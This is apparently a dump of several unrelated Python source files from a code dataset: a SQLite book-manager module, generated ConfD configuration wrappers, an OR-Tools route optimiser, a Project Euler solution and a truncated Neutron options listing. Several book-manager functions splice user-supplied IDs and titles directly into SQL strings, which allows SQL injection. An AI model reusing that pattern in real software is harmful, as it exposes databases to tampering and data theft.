conn.commit()#Apply the operation\n        print(\"New book aggregate\")\n        return True #signal that the insert succeeded\n    except Error as e:\n        print(\"Error inserting new book: \" + str(e))\n    finally: #this always runs whether or not an error occurred\n        if conn:\n            cur.close()\n            conn.close() #it is good practice to close the connection after the query\n\n\ndef update_book(_id,data): #to interpolate variables into strings we use an f-string\n    conn = 
create_conection()\n    sql = f\"\"\" UPDATE BOOKS SET \n            TITLE = ?,\n            CATEGORY = ?,\n            PAGE_QTY = ?,\n            PAGE_QTY_READ = ?,\n            BOOK_PATH = ?,\n            DESCRIPTION = ?\n            WHERE BOOK_ID = {_id} \n        \n    \"\"\"\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql,data)\n        conn.commit()\n        print(\"Edit book succes\")\n        return True\n    except Error as e:\n        print(\"Error updating book: \" + str(e))\n    finally:\n        if conn:\n            cur.close()\n            conn.close()\n\ndef delete_book(_id):\n    conn = create_conection()\n    sql = f\" DELETE from BOOKS where BOOK_ID = {_id}\"\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql) #here it receives no data, only the connection\n        conn.commit()\n        print(\"Delete book succes\")\n        return True\n    except Error as e:\n        print(\"Error deleting book: \" + str(e))\n    finally:\n        if conn:\n            cur.close()\n            conn.close()\n\ndef select_all_books():\n    conn = create_conection()\n    sql = \"\"\" SELECT * FROM BOOKS \"\"\"\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql)\n        #In functions where we do not add data we do not need to commit\n        #So we capture the results as follows\n        books = cur.fetchall() #fetch all the rows and store them\n        return books\n    except Error as e:\n        print(\"Error selecting all books: \" + str(e))\n    finally:\n        if conn:\n            cur.close()\n            conn.close()\n\ndef select_book_by_id(_id):\n    conn = create_conection()\n    sql = f\" SELECT * FROM BOOKS WHERE BOOK_ID = {_id} \"\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql)\n        book = cur.fetchone() #the query returns only one value\n        return book\n    except Error as e:\n        print(\"Error selecting book by id: \" + str(e))\n    finally:\n        if conn:\n            cur.close()\n            conn.close()\n\ndef select_book_by_title(TITLE):\n    conn = create_conection() #We use LIKE in the query to find similar titles, not exact matches\n    sql = f\" SELECT * FROM BOOKS WHERE TITLE LIKE '%{TITLE}%'\"\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql)\n        book = cur.fetchall() #in this case the query can return many books with similar titles\n        return book\n    except Error as e:\n        print(\"Error selecting book by title: \" + str(e))\n    finally:\n        if conn:\n            cur.close()\n            conn.close()\n\ndef select_book_by_category(CATEGORY):\n    conn = create_conection()\n    sql = f\" SELECT * FROM BOOKS WHERE CATEGORY LIKE '%{CATEGORY}%'\"\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql)\n        book = cur.fetchall()\n        return book\n    except Error as e:\n        print(\"Error selecting book by category: \" + str(e))\n    finally:\n        if conn:\n            cur.close()\n            conn.close()\n\n\n\n","repo_name":"Ralonso20/BookManager","sub_path":"db/books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3634148777","text":"\n\n\nfrom a.infra.misc.enum_with_value import EnumWithValue\nfrom a.infra.basic.return_codes import ReturnCodes\nfrom a.infra.misc.init_guard import InitGuard\n\nfrom a.sys.confd.pyconfdlib.tag_values import TagValues\nfrom a.sys.confd.pyconfdlib.value import Value\nfrom a.sys.confd.pyconfdlib.key_path import KeyPath\n\nfrom config_u_maapi_base_gen import ConfigUMaapiBase\n\n\n\n\nclass BlinkyConfigUMaapi(ConfigUMaapiBase):\n    def __init__ (self, logger):\n        self.myInitGuard = InitGuard()\n        self._log=logger.createLogger(\"sys-blinky-oper-example\",\"blinky-maapi-configU\")\n        self.domain = None\n\n    \n\n    \n        self.valueConfigU1Requested = False\n        self.valueConfigU1 = None\n        self.valueConfigU1Set = False\n    \n\n    def init (self, domain):\n        self.myInitGuard.crashIfInitDone()\n        for 
logFunc in self._log('init').debug3Func(): logFunc('called. domain=%s', domain)\n self.domain = domain\n self.myInitGuard.initDone()\n\n def requestConfigAndOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config-and-oper').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(True)\n \n \n \n\n def requestConfig (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-config').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(True)\n \n \n \n\n def requestOper (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-oper').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(False)\n \n \n \n\n def clearAllRequested (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-requested').debug3Func(): logFunc('called, PARAMS')\n \n self.requestValueConfigU1(False)\n \n \n \n\n def clearAllSet (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-set').debug3Func(): logFunc('called, PARAMS')\n \n self.setValueConfigU1(None)\n self.valueConfigU1Set = False\n \n \n\n def write (self\n , configU\n , trxContext=None\n ):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('write').debug3Func(): logFunc('called, PARAMS')\n return self._internalWrite(configU, trxContext)\n\n def read (self\n , configU\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(configU, \n False,\n trxContext)\n\n def readAllOrFail (self\n , configU\n \n , trxContext=None):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-all-or-fail').debug3Func(): logFunc('called, PARAMS')\n return self._internalRead(configU, \n True,\n trxContext)\n\n\n\n def requestValueConfigU1 (self, requested):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('request-valueconfigu1').debug3Func(): logFunc('called. requested=%s', requested)\n self.valueConfigU1Requested = requested\n self.valueConfigU1Set = False\n\n def isValueConfigU1Requested (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('is-valueconfigu1-requested').debug3Func(): logFunc('called. requested=%s', self.valueConfigU1Requested)\n return self.valueConfigU1Requested\n\n def getValueConfigU1 (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('get-valueconfigu1').debug3Func(): logFunc('called. self.valueConfigU1Set=%s, self.valueConfigU1=%s', self.valueConfigU1Set, self.valueConfigU1)\n if self.valueConfigU1Set:\n return self.valueConfigU1\n return None\n\n def hasValueConfigU1 (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('has-valueconfigu1').debug3Func(): logFunc('called. self.valueConfigU1Set=%s, self.valueConfigU1=%s', self.valueConfigU1Set, self.valueConfigU1)\n if self.valueConfigU1Set:\n return True\n return False\n\n def setValueConfigU1 (self, valueConfigU1):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('set-valueconfigu1').debug3Func(): logFunc('called. 
valueConfigU1=%s, old=%s', valueConfigU1, self.valueConfigU1)\n self.valueConfigU1Set = True\n self.valueConfigU1 = valueConfigU1\n\n\n def _clearAllReadData (self):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('clear-all-read-data').debug3Func(): logFunc('called')\n\n \n\n \n self.valueConfigU1 = 0\n self.valueConfigU1Set = False\n \n\n def _getSelfKeyPath (self, configU\n \n , junkForTemplate):\n for logFunc in self._log('get-self-key-path').debug3Func(): logFunc('called. PARAMS, junkForTemplate=%s', junkForTemplate)\n keyPath = KeyPath()\n \n \n ancestorVal = Value()\n ancestorVal.setString(configU);\n keyPath.addKeyPathPrefix(ancestorVal)\n \n xmlVal = Value()\n xmlVal.setXmlTag((\"config-u\", \"http://qwilt.com/model/oper\", \"oper\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n \n xmlVal = Value()\n xmlVal.setXmlTag((\"config-a\", \"http://qwilt.com/model/oper\", \"oper\"))\n keyPath.addKeyPathPrefix(xmlVal)\n \n\n for logFunc in self._log('get-self-key-path-done').debug3Func(): logFunc('done. keyPath=%s. PARAMS', keyPath)\n return keyPath\n\n def _internalWrite (self, \n configU, \n \n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-write').debug3Func(): logFunc('called. PARAMS')\n\n tagValueList = TagValues()\n\n res = self._fillWriteTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-fill-write-tag-value-failed').errorFunc(): logFunc('_fillWriteTagValues() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n itemsToDelete = []\n res = self._collectItemsToDelete(configU, \n \n itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-collect-items-to-delete-failed').errorFunc(): logFunc('_collectItemsToDelete() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(configU, \n \n None)\n\n res = self.domain.writeMaapi(tagValueList, keyPath, trxContext, itemsToDelete)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('write-domain-failed').errorFunc(): logFunc('domain.writeMaapi() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-write-done').debug3Func(): logFunc('done. PARAMS')\n return ReturnCodes.kOk\n\n def _internalRead (self, \n configU, \n \n readAllOrFail,\n trxContext):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('internal-read').debug3Func(): logFunc('called. PARAMS, readAllOrFail=%s', readAllOrFail)\n\n if readAllOrFail:\n self._clearAllReadData()\n\n tagValueList = TagValues()\n\n res = self._fillReadTagValues(tagValueList)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-fill-read-tag-value-failed').errorFunc(): logFunc('_fillReadTagValues() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n keyPath = self._getSelfKeyPath(configU, \n \n None)\n\n res = self.domain.readMaapi(tagValueList, keyPath, trxContext)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-domain-failed').errorFunc(): logFunc('domain.readMaapi() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n res = self._readTagValues(tagValueList, readAllOrFail)\n if res != ReturnCodes.kOk:\n for logFunc in self._log('read-read-tag-values-failed').errorFunc(): logFunc('_readTagValues() failed. PARAMS')\n return ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-read-done').debug3Func(): logFunc('done. 
PARAMS, readAllOrFail=%s', readAllOrFail)\n return ReturnCodes.kOk\n\n def _collectItemsToDelete (self,\n configU, \n \n itemsToDelete):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('collect-items-to-delete').debug3Func(): logFunc('called: itemsToDelete=%s. PARAMS', itemsToDelete)\n\n \n\n for logFunc in self._log('collect-items-to-delete-done').debug3Func(): logFunc('done: itemsToDelete=%s. PARAMS', itemsToDelete)\n return ReturnCodes.kOk\n\n def _fillWriteTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-write-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n \n if self.hasValueConfigU1():\n valValueConfigU1 = Value()\n if self.valueConfigU1 is not None:\n valValueConfigU1.setString(self.valueConfigU1)\n else:\n valValueConfigU1.setEmpty()\n tagValueList.push((\"value-config-u1\", \"http://qwilt.com/model/oper\"), valValueConfigU1)\n \n\n \n\n return ReturnCodes.kOk\n\n def _fillReadTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-read-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n \n if self.isValueConfigU1Requested():\n valValueConfigU1 = Value()\n valValueConfigU1.setEmpty()\n tagValueList.push((\"value-config-u1\", \"http://qwilt.com/model/oper\"), valValueConfigU1)\n \n\n \n\n return ReturnCodes.kOk\n\n def _readTagValues (self, tagValueList, readAllOrFail):\n __pychecker__ = 'maxlines=300'\n __pychecker__ = 'maxreturns=30'\n\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-tag-values').debug3Func(): logFunc('called. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)\n\n res = ReturnCodes.kOk\n\n for logFunc in self._log('read-tag-values-leaves').debug3Func(): logFunc('reading leaves. tagValueList=%s', tagValueList)\n \n if self.isValueConfigU1Requested():\n ((tag, ns), tempValue) = tagValueList.popFront()\n if (tag != \"value-config-u1\") or \\\n (ns != \"http://qwilt.com/model/oper\"):\n for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-valueconfigu1').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',\n \"valueConfigU1\", \"value-config-u1\", \"http://qwilt.com/model/oper\", tag, ns)\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n tempVar = None\n tempVar = tempValue.asString()\n if res != ReturnCodes.kOk or tempVar is None:\n for logFunc in self._log('read-tag-values-value-config-u1-bad-value').infoFunc(): logFunc('valueConfigU1 not read')\n if readAllOrFail:\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n if tempVar is not None:\n self.setValueConfigU1(tempVar)\n for logFunc in self._log('read-tag-values-value-config-u1').debug3Func(): logFunc('read valueConfigU1. valueConfigU1=%s, tempValue=%s', self.valueConfigU1, tempValue.getType())\n \n\n \n\n for logFunc in self._log('read-tag-values-done').debug3Func(): logFunc('done. 
readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)\n return ReturnCodes.kOk\n\n\n\n\"\"\"\nExtracted from the below data: \n{\n \"node\": {\n \"name\": \"configU\", \n \"namespace\": \"config_u\", \n \"className\": \"ConfigUMaapi\", \n \"importStatement\": \"from a.sys.blinky.example.oper.oper.config_a.config_u.config_u_maapi_gen import ConfigUMaapi\", \n \"baseClassName\": \"ConfigUMaapiBase\", \n \"baseModule\": \"config_u_maapi_base_gen\"\n }, \n \"ancestors\": [\n {\n \"moduleYangNamespacePrefix\": \"oper\", \n \"yangName\": \"config-a\", \n \"namespace\": \"config_a\", \n \"isCurrent\": false, \n \"isList\": false, \n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"name\": \"config-a\"\n }, \n {\n \"moduleYangNamespacePrefix\": \"oper\", \n \"isCurrent\": true, \n \"yangName\": \"config-u\", \n \"namespace\": \"config_u\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"keyLeaf\": {\n \"varName\": \"configU\", \n \"defaultVal\": null, \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"config-u\"\n }\n ], \n \"descendants\": [], \n \"conditionalDebugName\": null, \n \"operLeaves\": [], \n \"module\": {}, \n \"configLeaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"moduleYangNamespacePrefix\": \"oper\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"valueConfigU1\", \n \"yangName\": \"value-config-u1\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"env\": {\n \"namespaces\": [\n \"a\", \n \"sys\", \n \"blinky\", \n \"example\", \n \"oper\", \n \"oper\"\n ]\n }, \n \"leaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"moduleYangNamespacePrefix\": \"oper\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"valueConfigU1\", \n \"yangName\": \"value-config-u1\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"createTime\": \"2013\"\n}\n\"\"\"\n\n\n","repo_name":"afeset/miner2-tools","sub_path":"oscar/a/sys/blinky/example/oper/oper/config_a/config_u/config_u_maapi_gen.py","file_name":"config_u_maapi_gen.py","file_ext":"py","file_size_in_byte":14974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20232167094","text":"from __future__ import print_function\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nfrom typing import List, Optional, Tuple\nimport osmnx as ox\nimport networkx as nx\nimport folium\nfrom folium import plugins\nimport numpy as np\n\n\ndef print_solution(manager, routing, solution, names=None):\n \"\"\"\n Prints the solution on the console.\n\n Args:\n manager: The routing index manager.\n routing: The routing model.\n solution: The solution obtained from the routing solver.\n names (Optional[List[str]]): List of names corresponding to node indices. 
Defaults to None.\n \"\"\"\n index = routing.Start(0)\n plan_output = \"Route for vehicle:\\n\"\n route_distance = 0\n while not routing.IsEnd(index):\n idx = manager.IndexToNode(index)\n if names:\n print_value = names[idx]\n else:\n print_value = idx\n plan_output += \" {} ->\".format(print_value)\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n\n idx = manager.IndexToNode(index)\n if names:\n print_value = names[idx]\n else:\n print_value = idx\n plan_output += \" {}\\n\".format(print_value)\n plan_output += \"Route distance: {:.1f}km\\n\".format(route_distance / 1000)\n print(plan_output)\n\n\ndef optimize_routes(\n distance_matrix: List[List[int]], depot: int, names: Optional[List[str]] = None\n) -> List[int]:\n \"\"\"\n Solves the vehicle routing problem and returns the optimized route.\n\n Args:\n distance_matrix (List[List[int]]): 2D list representing the distance matrix between nodes.\n depot (int): Index of the depot (starting point).\n names (Optional[List[str]]): List of names corresponding to node indices. Defaults to None.\n\n Returns:\n List[int]: The optimized route as a list of node indices.\n \"\"\"\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(\n len(distance_matrix), 1, depot\n ) # num of vehicles set to 1\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return distance_matrix[from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n )\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Print solution on console and return the optimized route.\n if solution:\n print_solution(manager, routing, solution, names)\n route = []\n index = routing.Start(0)\n while not routing.IsEnd(index):\n route.append(manager.IndexToNode(index))\n index = solution.Value(routing.NextVar(index))\n route.append(manager.IndexToNode(index))\n return route\n else:\n return []\n\n\ndef plot_route(\n coordinates: List[Tuple[float, float]], dist: float = 1000, zoom_start: int = 15\n) -> folium.Map:\n \"\"\"\n Plot the route on a Folium map.\n\n Args:\n coordinates (List[Tuple[float, float]]): List of tuples containing (latitude, longitude) pairs.\n dist (float, optional): Distance for graph retrieval. Defaults to 1000.\n zoom_start (int, optional): Initial map zoom level. 
Defaults to 15.\n\n Returns:\n folium.Map: Folium map with the plotted route.\n \"\"\"\n\n # Calculate the median tuple\n median_tuple = tuple(np.median(np.array(coordinates), axis=0))\n\n # Calculate the Euclidean distance of each tuple from the median tuple\n distances = [\n np.linalg.norm(np.array(t) - np.array(median_tuple)) for t in coordinates\n ]\n\n # Find the index of the tuple with the minimum distance\n closest_index = np.argmin(distances)\n\n # Get the tuples with the closest and farthest values to the median tuple\n closest_tuple = coordinates[closest_index]\n\n # Create a graph using OpenStreetMap data\n graph = ox.graph_from_point(\n center_point=closest_tuple, dist=dist, network_type=\"drive\"\n )\n\n # Create a folium map centered at the start coordinate\n map_center = closest_tuple\n mymap = folium.Map(\n location=map_center, zoom_start=zoom_start, tiles=\"cartodbpositron\"\n )\n\n # Plot the route between each pair of consecutive coordinates\n num_stops = len(coordinates)\n for i in range(num_stops - 1):\n start_node = ox.distance.nearest_nodes(\n graph, coordinates[i][1], coordinates[i][0]\n )\n end_node = ox.distance.nearest_nodes(\n graph, coordinates[i + 1][1], coordinates[i + 1][0]\n )\n route = nx.shortest_path(graph, start_node, end_node, weight=\"length\")\n route_coordinates = [\n (graph.nodes[node][\"y\"], graph.nodes[node][\"x\"]) for node in route\n ]\n\n route_polyline = folium.PolyLine(locations=route_coordinates, color=\"red\")\n mymap.add_child(route_polyline)\n\n ant_path = plugins.AntPath(\n locations=route_coordinates,\n color=\"blue\",\n dash_array=[10, 50],\n delay=500,\n weight=5,\n )\n mymap.add_child(ant_path)\n\n # Add markers for the start and end points, and blue markers for the intermediate points\n folium.Marker(\n location=coordinates[-1], icon=folium.Icon(color=\"red\", icon=\"stop\")\n ).add_to(mymap)\n folium.Marker(\n location=coordinates[0], icon=folium.Icon(color=\"green\", icon=\"play\")\n ).add_to(mymap)\n for coordinate in coordinates[1:-1]:\n folium.Marker(\n location=coordinate, icon=folium.Icon(color=\"blue\", icon=\"store\")\n ).add_to(mymap)\n\n return mymap\n","repo_name":"albertferre/travelling-salesman-routing","sub_path":"src/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24483738910","text":"import useful as u\r\nimport math\r\n\r\nmaxVal = 10**9\r\nmaxPrimes = 10**8\r\n\r\nsmallPrimes = u.primesTo(25)\r\nlargePrimes = u.primesTo(maxPrimes)\r\nlargePrimesSet= set(largePrimes)\r\nprint(len(largePrimes))\r\n\r\ndef calcVal(x):\r\n answer = 1\r\n for i in range(len(x)):\r\n if x[i]==0:\r\n break\r\n answer *= smallPrimes[i]**x[i]\r\n return answer \r\n\r\ndef inc(x):\r\n temp = calcVal(x)\r\n new = x.copy()\r\n for i in range(len(x)):\r\n if temp*smallPrimes[i] < maxVal:\r\n new[i]+=1\r\n return new\r\n \r\n else:\r\n new[i]=1\r\n temp = calcVal(new)\r\n return []\r\n\r\nx=[0]*len(smallPrimes)\r\nvals = []\r\nwhile True:\r\n x = inc(x)\r\n if len(x)==0:\r\n break\r\n vals.append(calcVal(x))\r\n\r\nprint(len(vals))\r\n\r\nanswer = set()\r\n\r\nfor c,v in enumerate(vals):\r\n primeCan = v+3\r\n while not u.fastIsPrime2(primeCan,largePrimes,10**8,largePrimesSet):\r\n primeCan+=2\r\n answer.add(primeCan-v)\r\n\r\nprint(sum(answer))\r\n \r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 293.py","file_name":"problem 
293.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671964821","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport itertools\nimport operator\n\nfrom keystoneauth1 import loading as ks_loading\nfrom oslo_config import cfg\n\nimport neutron.agent.agent_extensions_manager\nimport neutron.agent.securitygroups_rpc\nimport neutron.conf.agent.agent_extensions_manager\nimport neutron.conf.agent.common\nimport neutron.conf.agent.database.agents_db\nimport neutron.conf.agent.database.agentschedulers_db\nimport neutron.conf.agent.dhcp\nimport neutron.conf.agent.l3.config\nimport neutron.conf.agent.l3.ha\nimport neutron.conf.agent.linux\nimport neutron.conf.agent.metadata.config as meta_conf\nimport neutron.conf.agent.ovs_conf\nimport neutron.conf.agent.ovsdb_api\nimport neutron.conf.common\nimport neutron.conf.db.dvr_mac_db\nimport neutron.conf.db.extraroute_db\nimport neutron.conf.db.l3_agentschedulers_db\nimport neutron.conf.db.l3_dvr_db\nimport neutron.conf.db.l3_extra_gws_db\nimport neutron.conf.db.l3_gwmode_db\nimport neutron.conf.db.l3_hamode_db\nimport neutron.conf.experimental\nimport neutron.conf.extensions.allowedaddresspairs\nimport neutron.conf.extensions.conntrack_helper\nimport neutron.conf.plugins.ml2.config\nimport neutron.conf.plugins.ml2.drivers.agent\nimport neutron.conf.plugins.ml2.drivers.driver_type\nimport neutron.conf.plugins.ml2.drivers.linuxbridge\nimport neutron.conf.plugins.ml2.drivers.macvtap\nimport neutron.conf.plugins.ml2.drivers.mech_sriov.agent_common\nimport neutron.conf.plugins.ml2.drivers.mech_sriov.mech_sriov_conf\nimport neutron.conf.plugins.ml2.drivers.openvswitch.mech_ovs_conf\nimport neutron.conf.plugins.ml2.drivers.ovs_conf\nimport neutron.conf.quota\nimport neutron.conf.service\nimport neutron.conf.services.extdns_designate_driver\nimport neutron.conf.services.logging\nimport neutron.conf.services.metering_agent\nimport neutron.conf.wsgi\nimport neutron.db.migration.cli\nimport neutron.extensions.l3\nimport neutron.extensions.securitygroup\nimport neutron.plugins.ml2.drivers.mech_sriov.agent.common.config\nimport neutron.wsgi\n\n\nAUTH_GROUPS_OPTS = {\n 'nova': {\n 'deprecations': {\n 'nova.cafile': [\n cfg.DeprecatedOpt('ca_certificates_file', group='nova')\n ],\n 'nova.insecure': [\n cfg.DeprecatedOpt('api_insecure', group='nova')\n ],\n 'nova.timeout': [\n cfg.DeprecatedOpt('url_timeout', group='nova')\n ]\n }\n },\n 'ironic': {},\n 'placement': {},\n 'designate': {}\n}\n\nCONF = cfg.CONF\n\n\ndef list_auth_opts(group):\n group_conf = AUTH_GROUPS_OPTS.get(group)\n kwargs = {'conf': CONF, 'group': group}\n deprecations = group_conf.get('deprecations')\n if deprecations:\n kwargs['deprecated_opts'] = deprecations\n opts = ks_loading.register_session_conf_options(\n **kwargs\n )\n opt_list = copy.deepcopy(opts)\n opt_list.insert(0, ks_loading.get_auth_common_conf_options()[0])\n # NOTE(mhickey): There are a lot of auth 
plugins, we just generate\n # the config options for a few common ones\n plugins = ['password', 'v2password', 'v3password']\n for name in plugins:\n for plugin_option in ks_loading.get_auth_plugin_conf_options(name):\n if all(option.name != plugin_option.name for option in opt_list):\n opt_list.append(plugin_option)\n opt_list.sort(key=operator.attrgetter('name'))\n return [(group, opt_list)]\n\n\ndef list_ironic_auth_opts():\n return list_auth_opts('ironic')\n\n\ndef list_nova_auth_opts():\n return list_auth_opts('nova')\n\n\ndef list_placement_auth_opts():\n return list_auth_opts('placement')\n\n\ndef list_designate_auth_opts():\n return list_auth_opts('designate')\n\n\ndef list_agent_opts():\n return [\n ('agent',\n itertools.chain(\n neutron.conf.agent.common.ROOT_HELPER_OPTS,\n neutron.conf.agent.common.AGENT_STATE_OPTS,\n neutron.conf.agent.common.IPTABLES_OPTS,\n neutron.conf.agent.common.PROCESS_MONITOR_OPTS,\n neutron.conf.agent.common.AVAILABILITY_ZONE_OPTS)\n ),\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.common.INTERFACE_DRIVER_OPTS,\n neutron.conf.agent.metadata.config.SHARED_OPTS)\n )\n ]\n\n\ndef list_extension_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.extensions.allowedaddresspairs\n .allowed_address_pair_opts,\n neutron.conf.extensions.conntrack_helper.conntrack_helper_opts)\n ),\n ('quotas',\n itertools.chain(\n neutron.conf.quota.l3_quota_opts,\n neutron.conf.quota.security_group_quota_opts)\n )\n ]\n\n\ndef list_db_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.database.agents_db.AGENT_OPTS,\n neutron.conf.db.extraroute_db.EXTRA_ROUTE_OPTS,\n neutron.conf.db.l3_gwmode_db.L3GWMODE_OPTS,\n neutron.conf.agent.database.agentschedulers_db\n .AGENTS_SCHEDULER_OPTS,\n neutron.conf.db.dvr_mac_db.DVR_MAC_ADDRESS_OPTS,\n neutron.conf.db.l3_dvr_db.ROUTER_DISTRIBUTED_OPTS,\n neutron.conf.db.l3_agentschedulers_db.L3_AGENTS_SCHEDULER_OPTS,\n neutron.conf.db.l3_hamode_db.L3_HA_OPTS,\n neutron.conf.db.l3_extra_gws_db.L3_EXTRA_GWS_OPTS)\n ),\n ('database',\n neutron.db.migration.cli.get_engine_config())\n ]\n\n\ndef list_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.common.core_cli_opts,\n neutron.conf.common.core_opts,\n neutron.conf.wsgi.socket_opts,\n neutron.conf.service.SERVICE_OPTS,\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n (neutron.conf.common.NOVA_CONF_SECTION,\n itertools.chain(\n neutron.conf.common.nova_opts)\n ),\n (neutron.conf.common.IRONIC_CONF_SECTION,\n itertools.chain(\n neutron.conf.common.ironic_opts)\n ),\n (neutron.conf.common.PLACEMENT_CONF_SECTION,\n itertools.chain(\n neutron.conf.common.placement_opts)\n ),\n ('designate',\n neutron.conf.services.extdns_designate_driver.designate_opts\n ),\n ('quotas', neutron.conf.quota.core_quota_opts)\n ]\n\n\ndef list_base_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.common.INTERFACE_OPTS,\n neutron.conf.agent.common.INTERFACE_DRIVER_OPTS,\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('agent', neutron.conf.agent.common.AGENT_STATE_OPTS),\n ('ovs',\n itertools.chain(\n neutron.conf.agent.ovsdb_api.API_OPTS,\n neutron.conf.agent.ovs_conf.OPTS)\n ),\n ]\n\n\ndef list_az_agent_opts():\n return [\n ('agent', neutron.conf.agent.common.AVAILABILITY_ZONE_OPTS),\n ]\n\n\ndef list_dhcp_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.dhcp.DHCP_AGENT_OPTS,\n 